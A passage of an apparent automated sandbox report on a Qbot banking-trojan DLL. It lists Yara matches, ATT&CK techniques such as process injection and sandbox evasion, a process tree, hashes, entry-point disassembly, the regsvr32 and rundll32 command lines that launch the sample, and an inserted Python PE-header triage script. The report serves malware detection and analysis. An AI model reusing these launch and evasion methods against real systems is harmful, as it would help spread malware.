          Source: Yara match | File source: 00000005.00000002.268833263.0000000002EE0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY

          Remote Access Functionality

          Source: Yara match | File source: 9.2.wermgr.exe.970000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 3.2.regsvr32.exe.990000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 4.2.rundll32.exe.4450000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 7.0.wermgr.exe.e40000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.2.rundll32.exe.2ee0000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 4.3.rundll32.exe.4430000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 7.0.wermgr.exe.e40000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 3.3.regsvr32.exe.590000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 8.0.wermgr.exe.12a0000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 4.2.rundll32.exe.4450000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 3.3.regsvr32.exe.590000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 9.2.wermgr.exe.970000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 7.2.wermgr.exe.e40000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 9.0.wermgr.exe.970000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 9.0.wermgr.exe.970000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.3.rundll32.exe.2d60000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 4.3.rundll32.exe.4430000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.2.rundll32.exe.2ee0000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 3.2.regsvr32.exe.990000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 7.2.wermgr.exe.e40000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.3.rundll32.exe.2d60000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 8.0.wermgr.exe.12a0000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000007.00000002.270568639.0000000000E40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000003.00000002.269120079.0000000000990000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000004.00000002.269061857.0000000004450000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000000.268101186.0000000000E40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000004.00000003.261746477.0000000004430000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000008.00000000.268192549.00000000012A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000003.00000003.261366767.0000000000590000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000009.00000002.270604125.0000000000970000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000003.261991952.0000000002D60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000009.00000000.268299338.0000000000970000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000002.268833263.0000000002EE0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY

          MITRE ATT&CK Matrix (grouped by tactic; the report's signature counts are kept as they appear before each matched technique)

          Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
          Execution: 3 Native API; Scheduled Task/Job; At (Linux); At (Windows); Cron; Launchd; Scheduled Task; Command and Scripting Interpreter
          Persistence: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job
          Privilege Escalation: 311 Process Injection; 1 DLL Side-Loading; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job
          Defense Evasion: 1 Masquerading; 1 Virtualization/Sandbox Evasion; 311 Process Injection; 2 Obfuscated Files or Information; 1 Regsvr32; 1 Rundll32; 1 Software Packing; 1 DLL Side-Loading
          Credential Access: 1 Credential API Hooking; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
          Discovery: 1 System Time Discovery; 11 Security Software Discovery; 1 Virtualization/Sandbox Evasion; 2 Process Discovery; 1 File and Directory Discovery; 15 System Information Discovery; Network Sniffing; Network Service Scanning
          Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Shared Webroot
          Collection: 1 Screen Capture; 1 Credential API Hooking; 1 Archive Collected Data; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
          Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
          Command and Control: 1 Encrypted Channel; Junk Data; Steganography; Protocol Impersonation; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol
          Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points; Downgrade to Insecure Protocols
          Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
          Impact: Modify System Partition; Device Lockout; Delete Device Data; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features; Data Encrypted for Impact; Generate Fraudulent Advertising Revenue

          Behavior Graph (ID: 715156, sample: pebbles.dat.dll, start date: 03/10/2022, architecture: WINDOWS, score: 96)

          Signatures on the sample: Malicious sample detected (through community Yara rule); Multi AV Scanner detection for submitted file; Yara detected Qbot; 3 other signatures

          Process tree:
          loaddll32.exe
            regsvr32.exe (Overwrites code with unconditional jumps - possibly settings hooks in foreign process; Writes to foreign memory regions; Allocates memory in foreign processes)
              wermgr.exe
              audiodg.exe
            cmd.exe
              rundll32.exe (Overwrites code with unconditional jumps - possibly settings hooks in foreign process; Writes to foreign memory regions; Allocates memory in foreign processes; Maps a DLL or memory area into another process)
                wermgr.exe
            rundll32.exe (Maps a DLL or memory area into another process)
              wermgr.exe, dropped: C:\Users\user\Desktop\pebbles.dat.dll, PE32
            3 other processes

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample:
          Source: pebbles.dat.dll | Detection: 17% | Scanner: ReversingLabs
          Source: pebbles.dat.dll | Detection: 100% | Scanner: Joe Sandbox ML

          Dropped Files: No Antivirus matches

          Unpacked PE Files:
          Source: 9.2.wermgr.exe.970000.0.unpack | Detection: 100% | Scanner: Avira | Label: HEUR/AGEN.1234562
          Source: 8.0.wermgr.exe.12a0000.0.unpack | Detection: 100% | Scanner: Avira | Label: HEUR/AGEN.1234562
          Source: 3.2.regsvr32.exe.990000.0.unpack | Detection: 100% | Scanner: Avira | Label: HEUR/AGEN.1234562
          Source: 4.2.rundll32.exe.4450000.0.unpack | Detection: 100% | Scanner: Avira | Label: HEUR/AGEN.1234562
          Source: 9.0.wermgr.exe.970000.0.unpack | Detection: 100% | Scanner: Avira | Label: HEUR/AGEN.1234562
          Source: 7.2.wermgr.exe.e40000.0.unpack | Detection: 100% | Scanner: Avira | Label: HEUR/AGEN.1234562
          Source: 5.2.rundll32.exe.2ee0000.0.unpack | Detection: 100% | Scanner: Avira | Label: HEUR/AGEN.1234562
          Source: 7.0.wermgr.exe.e40000.0.unpack | Detection: 100% | Scanner: Avira | Label: HEUR/AGEN.1234562

          Domains: No Antivirus matches
          URLs: No Antivirus matches

          No contacted domains info
          No contacted IP infos
          Joe Sandbox Version: 36.0.0 Rainbow Opal
          Analysis ID: 715156
          Start date and time: 2022-10-03 17:38:53 +02:00
          Joe Sandbox Product: CloudBasic
          Overall analysis duration: 0h 9m 18s
          Hypervisor based Inspection enabled: false
          Report type: full
          Sample file name: pebbles.dat.dll
          Cookbook file name: default.jbs
          Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
          Run name: Run with higher sleep bypass
          Number of new started processes analysed: 38
          Number of new started drivers analysed: 0
          Number of existing processes analysed: 0
          Number of existing drivers analysed: 0
          Number of injected processes analysed: 0
          Technologies:
          • HCA enabled
          • EGA enabled
          • HDC enabled
          • AMSI enabled
          Analysis Mode: default
          Analysis stop reason: Timeout
          Detection: MAL
          Classification: mal96.troj.evad.winDLL@21/1@0/0
          EGA Information:
          • Successful, ratio: 100%
          HDC Information:
          • Successful, ratio: 25.3% (good quality ratio 24%)
          • Quality average: 77.1%
          • Quality standard deviation: 26.2%
          HCA Information:
          • Successful, ratio: 100%
          • Number of executed functions: 40
          • Number of non-executed functions: 43
          Cookbook Comments:
          • Found application associated with file extension: .dll
          • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
          • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, RuntimeBroker.exe, WMIADAP.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
          • Excluded domains from analysis (whitelisted): fs.microsoft.com, login.live.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
          • Not all processes were analyzed; the report is missing behavior information
          • Report creation exceeded the maximum time and may be missing disassembly code information
          No simulations
          No context
          Process: C:\Windows\SysWOW64\wermgr.exe
          File Type: PE32 executable (DLL) (console) Intel 80386, for MS Windows
          Category: dropped
          Size (bytes): 4096
          Entropy (8bit): 4.667100449217363
          Encrypted: false
          SSDEEP: 96:UORfeVXzt2Dk1dyqIF9JhsLwAOhf2ZW2wIPD:UORAjMkXIKPD
          MD5: 21928784DA52AB71A60AF59EFA95CDAD
          SHA1: 4FF8ECD9B0370614EA0C3D8583A51DF9D2481844
          SHA-256: 285861283C9DC3F2D892B3CC186AD64CF17217D394B227A70B6C657C39D6568B
          SHA-512: CD79DFD111B8E1E8A3EB2F7E57DFB71D76AF677D6696564C15413391D7734F0C4A10D3987A3D4D9739C082C0710BC5B8566A4D4AB295EA501B5D909D0294C3F8
          Malicious: true
          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......._.....~[..~[..~[..}Z..~[..{Z..~[..zZ..~[I.zZ..~[I.}Z..~[I.{ZX.~[...Z..~[...[o.~[..wZ..~[..~Z..~[..[..~[...[..~[..|Z..~[Rich..~[........................PE..L.....:c...........!.........~..............0............................................@..........................p.......A..P................................6......p...........................0...@............@...............................data....a.......b.................. ....reloc6s.............f.............. ..`CODE.........0...........................idata..0....@......................@..@.hata....5...P...6..................@..@DATA....T............J..............@..@.rsrc................L..............@..@.reloc...6.......8...N..............@..B........................................................................................................................................................
          File type: PE32 executable (DLL) (console) Intel 80386, for MS Windows
          Entropy (8bit): 6.9607693404023925
          TrID:
          • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
          • Generic Win/DOS Executable (2004/3) 0.20%
          • DOS Executable Generic (2002/1) 0.20%
          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
          File name: pebbles.dat.dll
          File size: 493056
          MD5: d89521adaf6418e6ebe43b1a1a9d2af9
          SHA1: 38cac8495ef43e51cdac1cb5e85d10137b365bee
          SHA256: 1965dc57456d4fc01b6ce0f242d80776fe08a16354e6177255cba618348355ac
          SHA512: 703db1e11372070dbbabc8a96c8600f079273e4dfad4e5437a5fd4b046187cf9f24b47ad68fadaf3bcf7fb1dcad8ecf98edd299281938eb144c4c6c29d68461f
          SSDEEP: 12288:Y2X+B4HKFVxT5jXAcOf35HI9H5RGqdIhr54f:L5EVl5DC4HDbd
          TLSH: DBA48D0AB612C430D66910B12876BBE047ACBD325E751EDF73805F778A641F77A29F22
          File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......._.....~[..~[..~[..}Z..~[..{Z..~[..zZ..~[I.zZ..~[I.}Z..~[I.{ZX.~[...Z..~[...[o.~[..wZ..~[..~Z..~[...[..~[...[..~[..|Z..~[Rich..~
          Icon Hash: 74f0e4ecccdce0e4
          Entrypoint: 0x100382d9
          Entrypoint Section: .data
          Digitally signed: false
          Imagebase: 0x10000000
          Subsystem: windows cui
          Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL
          DLL Characteristics: DYNAMIC_BASE, NX_COMPAT
          Time Stamp: 0x633AE6FF [Mon Oct 3 13:43:27 2022 UTC]
          TLS Callbacks:
          CLR (.Net) Version:
          OS Version Major: 6
          OS Version Minor: 0
          File Version Major: 6
          File Version Minor: 0
          Subsystem Version Major: 6
          Subsystem Version Minor: 0
          Import Hash: 8877a7b766af3aace7fcad8462a174cc
          Entrypoint instructions:
          push ebp
          mov ebp, esp
          cmp dword ptr [ebp+0Ch], 01h
          jne 00007FD97CC082C7h
          call 00007FD97CC087E4h
          push dword ptr [ebp+10h]
          push dword ptr [ebp+0Ch]
          push dword ptr [ebp+08h]
          call 00007FD97CC08173h
          add esp, 0Ch
          pop ebp
          retn 000Ch
          cmp ecx, dword ptr [10001D84h]
          jne 00007FD97CC082C3h
          ret
          jmp 00007FD97CC088CDh
          mov ecx, dword ptr [ebp-0Ch]
          mov dword ptr fs:[00000000h], ecx
          pop ecx
          pop edi
          pop edi
          pop esi
          pop ebx
          mov esp, ebp
          pop ebp
          push ecx
          ret
          push eax
          push dword ptr fs:[00000000h]
          lea eax, dword ptr [esp+0Ch]
          sub esp, dword ptr [esp+0Ch]
          push ebx
          push esi
          push edi
          mov dword ptr [eax], ebp
          mov ebp, eax
          mov eax, dword ptr [10001D84h]
          xor eax, ebp
          push eax
          push dword ptr [ebp-04h]
          mov dword ptr [ebp-04h], FFFFFFFFh
          lea eax, dword ptr [ebp-0Ch]
          mov dword ptr fs:[00000000h], eax
          ret
          push eax
          push dword ptr fs:[00000000h]
          lea eax, dword ptr [esp+0Ch]
          sub esp, dword ptr [esp+0Ch]
          push ebx
          push esi
          push edi
          mov dword ptr [eax], ebp
          mov ebp, eax
          mov eax, dword ptr [10001D84h]
          xor eax, ebp
          push eax
          mov dword ptr [ebp-10h], esp
          push dword ptr [ebp-04h]
          mov dword ptr [ebp-04h], FFFFFFFFh
          lea eax, dword ptr [ebp-0Ch]
          mov dword ptr fs:[00000000h], eax
          ret
          int3
          int3
          int3
          int3
          int3
          int3
          int3
          int3
          int3
          push ecx
          lea ecx, dword ptr [esp+08h]
          sub ecx, eax
          and ecx, 0Fh
          add eax, ecx
          sbb ecx, ecx
          or eax, ecx
Name                                   Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT           0x57010          0x10f         .data
IMAGE_DIRECTORY_ENTRY_IMPORT           0x74188          0x50          .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE         0x7a000          0x1e0         .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION        0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY         0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC        0x7b000          0x36b4        .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG            0x311c0          0x70          .data
IMAGE_DIRECTORY_ENTRY_COPYRIGHT        0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR        0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS              0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG      0x31230          0x40          .data
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT     0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT              0x74000          0x184         .idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT     0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR   0x0              0x0
IMAGE_DIRECTORY_ENTRY_RESERVED         0x0              0x0
Name      Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity     File Type               Entropy             Characteristics
.data     0x1000           0x5611f       0x56200   False     0.6558956594702468  data                    7.0153365923230595  IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc6s  0x58000          0x1a0f9       0x1a200   False     0.3239383971291866  COM executable for DOS  6.066972398111804   IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
CODE      0x73000          0x200         0x0       False     0                   empty                   0.0                 IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata    0x74000          0xa30         0xc00     False     0.404296875         data                    4.897788340416598   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.hata     0x75000          0x35e7        0x3600    False     0.7127459490740741  data                    5.561450278641814   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
DATA      0x79000          0x54          0x200     False     0.162109375         data                    1.2433795844140498  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc     0x7a000          0x1e0         0x200     False     0.53125             data                    4.724728911998389   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc    0x7b000          0x36b4        0x3800    False     0.7310267857142857  data                    6.633507194727193   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
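The section table above is the raw material for the header-level verdicts in this report: the entry point 0x100382d9 (image base 0x10000000, so RVA 0x382d9) falls inside .data rather than a .text section, that same .data section carries CODE, EXECUTE, READ and WRITE, and four of the eight section names (.reloc6s, CODE, .hata, DATA) are not what an MSVC link produces. The script below is an added example, not Joe Sandbox code, that reproduces those checks with a standard-library PE header parser. build_sample_pe() synthesises a header-only PE32 with the section table and entry point listed above so the script runs offline; it is a constructed stand-in, not the sample's bytes, and the set of "standard" section names is this example's own assumption. Pass a file path as the first argument to run the same checks against a real binary.

```python
import struct
import sys

# IMAGE_SCN_* section characteristic bits from the PE/COFF specification.
SCN_CNT_CODE = 0x00000020
SCN_CNT_INITIALIZED_DATA = 0x00000040
SCN_CNT_UNINITIALIZED_DATA = 0x00000080
SCN_MEM_DISCARDABLE = 0x02000000
SCN_MEM_EXECUTE = 0x20000000
SCN_MEM_READ = 0x40000000
SCN_MEM_WRITE = 0x80000000

# Section names an MSVC link normally emits. Treating anything else as
# non-standard is this example's own heuristic (an assumption).
STANDARD_NAMES = {".text", ".rdata", ".data", ".idata", ".edata", ".pdata",
                  ".rsrc", ".reloc", ".bss", ".tls", ".CRT", ".gfids", ".00cfg"}


def parse_pe(data):
    """Return entry-point RVA, image base and section table of a PE image."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ header")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    _, nsections, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, e_lfanew + 4)
    opt = e_lfanew + 24                               # optional header offset
    magic = struct.unpack_from("<H", data, opt)[0]
    entry_rva = struct.unpack_from("<I", data, opt + 16)[0]
    if magic == 0x10B:                                # PE32
        image_base = struct.unpack_from("<I", data, opt + 28)[0]
    elif magic == 0x20B:                              # PE32+
        image_base = struct.unpack_from("<Q", data, opt + 24)[0]
    else:
        raise ValueError("unknown optional header magic 0x%x" % magic)
    sections = []
    for i in range(nsections):                        # 40-byte section headers
        off = opt + opt_size + 40 * i
        name = data[off:off + 8].rstrip(b"\0").decode("latin-1")
        vsize, va, rawsize = struct.unpack_from("<III", data, off + 8)
        flags = struct.unpack_from("<I", data, off + 36)[0]
        sections.append({"name": name, "va": va, "vsize": vsize,
                         "rawsize": rawsize, "flags": flags})
    return {"entry_rva": entry_rva, "image_base": image_base, "sections": sections}


def triage(data):
    """Header-level checks: where the entry point lives, RWX sections, odd names."""
    pe = parse_pe(data)
    out = {"entry_va": pe["image_base"] + pe["entry_rva"], "entry_section": None,
           "executable_sections": [], "rwx_sections": [], "nonstandard_names": []}
    for s in pe["sections"]:
        if s["va"] <= pe["entry_rva"] < s["va"] + max(s["vsize"], s["rawsize"]):
            out["entry_section"] = s["name"]
        if s["flags"] & SCN_MEM_EXECUTE:
            out["executable_sections"].append(s["name"])
            if s["flags"] & SCN_MEM_WRITE:            # writable and executable
                out["rwx_sections"].append(s["name"])
        if s["name"] not in STANDARD_NAMES:
            out["nonstandard_names"].append(s["name"])
    out["entry_outside_text"] = out["entry_section"] != ".text"
    return out


def build_pe32(sections, entry_rva, image_base):
    """Synthesise a header-only PE32 DLL (no section bodies) for offline use."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)           # e_lfanew
    file_hdr = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, 0xE0, 0x2102)
    opt = bytearray(0xE0)
    struct.pack_into("<H", opt, 0, 0x10B)             # PE32 magic
    struct.pack_into("<I", opt, 16, entry_rva)        # AddressOfEntryPoint
    struct.pack_into("<I", opt, 28, image_base)       # ImageBase
    hdrs = b"".join(name.encode("latin-1").ljust(8, b"\0")
                    + struct.pack("<IIIIIIHHI", vsize, va, rawsize, 0, 0, 0, 0, 0, flags)
                    for name, va, vsize, rawsize, flags in sections)
    return bytes(dos) + b"PE\0\0" + file_hdr + bytes(opt) + hdrs


def build_sample_pe():
    """Constructed stand-in mirroring the report's section table and entry point
    (0x100382d9 at image base 0x10000000); not the real sample's bytes."""
    r, w, x = SCN_MEM_READ, SCN_MEM_WRITE, SCN_MEM_EXECUTE
    return build_pe32([
        (".data",    0x1000,  0x5611f, 0x56200, SCN_CNT_CODE | x | r | w),
        (".reloc6s", 0x58000, 0x1a0f9, 0x1a200, SCN_CNT_CODE | x | r),
        ("CODE",     0x73000, 0x200,   0x0,     SCN_CNT_UNINITIALIZED_DATA | r | w),
        (".idata",   0x74000, 0xa30,   0xc00,   SCN_CNT_INITIALIZED_DATA | r),
        (".hata",    0x75000, 0x35e7,  0x3600,  SCN_CNT_INITIALIZED_DATA | r),
        ("DATA",     0x79000, 0x54,    0x200,   SCN_CNT_INITIALIZED_DATA | r),
        (".rsrc",    0x7a000, 0x1e0,   0x200,   SCN_CNT_INITIALIZED_DATA | r),
        (".reloc",   0x7b000, 0x36b4,  0x3800,  SCN_CNT_INITIALIZED_DATA | SCN_MEM_DISCARDABLE | r),
    ], entry_rva=0x382d9, image_base=0x10000000)


if __name__ == "__main__":
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_pe()
    for key, value in triage(blob).items():
        print("%-20s %s" % (key, hex(value) if key == "entry_va" else value))
```

The entry-point check uses the larger of virtual and raw size so a section like CODE (0x200 virtual, 0 raw) is still matched; a writable code section is the strongest single signal here, since a packer that decrypts its payload in place needs exactly that combination.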
Name         RVA      Size   Type                                                     Language  Country
RT_MANIFEST  0x7a060  0x17d  XML 1.0 document, ASCII text, with CRLF line terminators  English   United States
DLL           Import
KERNEL32.dll  Sleep, DebugBreak, GetCurrentProcess, lstrlenA, GetCurrentThreadId, lstrcmpA, VirtualAlloc, GetVersion, GetCommandLineA, GetFileAttributesA, GetCurrentThread, GetCurrentProcessId, GetModuleHandleW, lstrcmpiA, CreateFileW, CloseHandle, GetModuleHandleA, GetConsoleMode, GetConsoleOutputCP, WriteFile, FlushFileBuffers, HeapSize, SetStdHandle, WideCharToMultiByte, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionEx, DeleteCriticalSection, EncodePointer, DecodePointer, MultiByteToWideChar, LCMapStringEx, GetStringTypeW, GetCPInfo, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, RtlUnwind, RaiseException, InterlockedFlushSList, GetLastError, SetLastError, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, GetProcAddress, LoadLibraryExW, ExitProcess, GetModuleHandleExW, GetModuleFileNameW, HeapAlloc, HeapFree, GetStdHandle, GetFileType, LCMapStringW, GetLocaleInfoW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, MoveFileExW, HeapReAlloc, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, GetProcessHeap, SetFilePointerEx, WriteConsoleW
ADVAPI32.dll  CryptCreateHash, CryptHashData, CryptDestroyHash, CryptGetHashParam, CryptReleaseContext, CryptAcquireContextA
SHLWAPI.dll   PathFindExtensionA, PathFindOnPathA, PathFileExistsA, PathFindSuffixArrayA, StrToIntA
Name                 Ordinal  Address
DllRegisterServer    1        0x1006eb00
DllUnregisterServer  2        0x1006f6f0
bewailable           3        0x10058e00
courtlet             4        0x10063590
noncensored          5        0x10067e60
rhizocarpean         6        0x100605f0
stine                7        0x10069040
strigiles            8        0x1005de90
targetlike           9        0x1006b820
trimethoxy           10       0x10061fd0
Language of compilation system  Country where language is spoken
English                         United States
          No network behavior found


          Target ID:0
          Start time:17:39:50
          Start date:03/10/2022
          Path:C:\Windows\System32\loaddll32.exe
          Wow64 process (32bit):true
          Commandline:loaddll32.exe "C:\Users\user\Desktop\pebbles.dat.dll"
          Imagebase:0xb90000
          File size:116736 bytes
          MD5 hash:1F562FBF37040EC6C43C8D5EF619EA39
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:low

          Target ID:1
          Start time:17:39:50
          Start date:03/10/2022
          Path:C:\Windows\System32\conhost.exe
          Wow64 process (32bit):false
          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Imagebase:0x7ff745070000
          File size:625664 bytes
          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:high

          Target ID:2
          Start time:17:39:51
          Start date:03/10/2022
          Path:C:\Windows\SysWOW64\cmd.exe
          Wow64 process (32bit):true
          Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\pebbles.dat.dll",#1
          Imagebase:0xb0000
          File size:232960 bytes
          MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:high

          Target ID:3
          Start time:17:39:51
          Start date:03/10/2022
          Path:C:\Windows\SysWOW64\regsvr32.exe
          Wow64 process (32bit):true
          Commandline:regsvr32.exe /s C:\Users\user\Desktop\pebbles.dat.dll
          Imagebase:0xae0000
          File size:20992 bytes
          MD5 hash:426E7499F6A7346F0410DEAD0805586B
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Yara matches:
          • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000003.00000002.269120079.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Trojan_Qbot_92c67a6d, Description: unknown, Source: 00000003.00000002.269120079.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Author: unknown
          • Rule: Windows_Trojan_Qbot_3074a8d4, Description: unknown, Source: 00000003.00000002.269120079.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Author: unknown
          • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000003.00000003.261366767.0000000000590000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Trojan_Qbot_92c67a6d, Description: unknown, Source: 00000003.00000003.261366767.0000000000590000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
          • Rule: Windows_Trojan_Qbot_3074a8d4, Description: unknown, Source: 00000003.00000003.261366767.0000000000590000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
          Reputation:high

          Target ID:4
          Start time:17:39:51
          Start date:03/10/2022
          Path:C:\Windows\SysWOW64\rundll32.exe
          Wow64 process (32bit):true
          Commandline:rundll32.exe "C:\Users\user\Desktop\pebbles.dat.dll",#1
          Imagebase:0x170000
          File size:61952 bytes
          MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Yara matches:
          • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000004.00000002.269061857.0000000004450000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Trojan_Qbot_92c67a6d, Description: unknown, Source: 00000004.00000002.269061857.0000000004450000.00000040.00000800.00020000.00000000.sdmp, Author: unknown
          • Rule: Windows_Trojan_Qbot_3074a8d4, Description: unknown, Source: 00000004.00000002.269061857.0000000004450000.00000040.00000800.00020000.00000000.sdmp, Author: unknown
          • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000004.00000003.261746477.0000000004430000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
